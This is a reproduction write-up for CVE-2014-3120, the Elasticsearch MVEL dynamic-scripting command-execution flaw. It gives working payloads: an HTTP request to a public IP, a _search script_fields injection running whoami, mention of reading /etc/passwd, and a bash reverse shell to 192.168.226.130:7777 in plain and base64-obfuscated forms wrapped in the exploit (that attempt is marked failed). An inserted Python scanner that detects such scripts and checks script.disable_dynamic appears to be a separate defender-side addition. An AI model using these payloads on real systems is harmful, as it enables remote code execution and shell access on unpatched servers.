CVE-2014-3120 Command Execution Vulnerability
1. Vulnerability Details
Older versions of Elasticsearch accept dynamic scripts (MVEL) to perform complex operations. MVEL can execute Java code and runs without a sandbox, so arbitrary code can be executed directly.
MVEL code that executes a command:
import java.io.*;
new java.util.Scanner(Runtime.getRuntime().exec("whoami").getInputStream()).useDelimiter("\\A").next();
2. Vulnerability Reproduction
Visit http://47.236.138.222:9200/
In Repeater, modify the request and use _search to retrieve the payload's response. Note that if the index contains no data, a document must be written first before the injection will succeed.
POST /helloword/hello HTTP/1.1
Host: 47.236.138.222:9200
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
{
"name":"esdemo"
}
Then retrieve the injection result:
{
  "size": 1,
  "script_fields": {
    "command": {
      "script": "import java.io.*; new java.util.Scanner(Runtime.getRuntime().exec(\"whoami\").getInputStream()).useDelimiter(\"\\\\A\").next();"
    }
  }
}
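An added defender-side example, not code from the write-up: a Python scanner that walks Elasticsearch request bodies, records every inline "script" value as a low-severity finding (dynamic scripting in use at all) and raises it to high when the script names JVM process-execution or reflection APIs such as the Runtime.getRuntime().exec call used above. It also checks an elasticsearch.yml fragment for script.disable_dynamic: true, the setting Elasticsearch 1.2.0 made the default to close this CVE. The sample requests and config fragments are constructed here; the indicator list is an assumption chosen for illustration.

```python
import json
import re

# Java identifiers that indicate process execution or reflection inside a
# script string. Case-sensitive on purpose: these are class/method names.
# Assumption: this list is illustrative, not exhaustive.
RCE_INDICATORS = re.compile(
    r"Runtime\.getRuntime|ProcessBuilder|java\.io\.|java\.lang\.|\.exec\(|Class\.forName"
)


def iter_scripts(node, path=""):
    """Yield (json_path, script_text) for every "script" key holding a string,
    recursing through nested objects and arrays (script_fields, update scripts, ...)."""
    if isinstance(node, dict):
        for key, value in node.items():
            child = f"{path}.{key}" if path else key
            if key == "script" and isinstance(value, str):
                yield child, value
            else:
                yield from iter_scripts(value, child)
    elif isinstance(node, list):
        for index, item in enumerate(node):
            yield from iter_scripts(item, f"{path}[{index}]")


def analyze_request(method, path, body):
    """Return findings for one Elasticsearch HTTP request.

    Any inline script is a "low" finding (dynamic scripting in use at all);
    a script that names JVM process/reflection APIs is "high"."""
    findings = []
    if not body.strip():
        return findings
    try:
        doc = json.loads(body)
    except json.JSONDecodeError:
        return findings  # not a single JSON document (bulk/NDJSON or garbage)
    for json_path, script in iter_scripts(doc):
        indicators = sorted(set(RCE_INDICATORS.findall(script)))
        findings.append({
            "severity": "high" if indicators else "low",
            "request": f"{method} {path}",
            "field": json_path,
            "indicators": indicators,
        })
    return findings


def scan(requests):
    """Run analyze_request over (method, path, body) tuples and flatten the results."""
    results = []
    for method, path, body in requests:
        results.extend(analyze_request(method, path, body))
    return results


def dynamic_scripting_disabled(yaml_text):
    """True if elasticsearch.yml sets script.disable_dynamic: true.
    Minimal line-based parse so no YAML library is needed."""
    match = re.search(r"^\s*script\.disable_dynamic\s*:\s*(\S+)", yaml_text, re.MULTILINE)
    return bool(match) and match.group(1).strip('"\'').lower() == "true"


# Constructed sample traffic: the index write and the _search payload from the
# write-up, a benign script_fields query, and a request with no body.
SAMPLE_REQUESTS = [
    ("POST", "/helloword/hello", '{"name": "esdemo"}'),
    ("POST", "/_search", r'''{"size": 1, "script_fields": {"command": {"script": "import java.io.*; new java.util.Scanner(Runtime.getRuntime().exec(\"whoami\").getInputStream()).useDelimiter(\"\\\\A\").next();"}}}'''),
    ("POST", "/_search", '{"query": {"match_all": {}}, "script_fields": {"doubled": {"script": "doc[\'price\'].value * 2"}}}'),
    ("GET", "/_cluster/health", ""),
]

# Constructed config fragments: the 1.0/1.1 default (dynamic scripts allowed) vs. hardened.
WEAK_CONFIG = "cluster.name: esdemo\nscript.disable_dynamic: false\n"
HARDENED_CONFIG = "cluster.name: esdemo\nscript.disable_dynamic: true\n"

if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print(finding)
    print("weak config disables dynamic scripting:", dynamic_scripting_disabled(WEAK_CONFIG))
    print("hardened config disables dynamic scripting:", dynamic_scripting_disabled(HARDENED_CONFIG))
```

Running the block prints one high finding for the whoami payload (field script_fields.command.script) and one low finding for the arithmetic script; the empty-body and plain index-write requests produce nothing. The same walk can be fed from a reverse proxy or HTTP access log that retains request bodies.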
View /etc/passwd
Reverse shell
bash -i >&/dev/tcp/192.168.226.130/7777 0>&1
bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzE5Mi4xNjguMjI2LjEzMC83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}
Construct the payload:
{
  "size": 1,
  "script_fields": {
    "command": {
      "script": "import java.io.*; new java.util.Scanner(Runtime.getRuntime().exec(\"bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzE5Mi4xNjguMjI2LjEzMC83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}\").getInputStream()).useDelimiter(\"\\\\A\").next();"
    }
  }
}
Start a listener and resend the request (failed)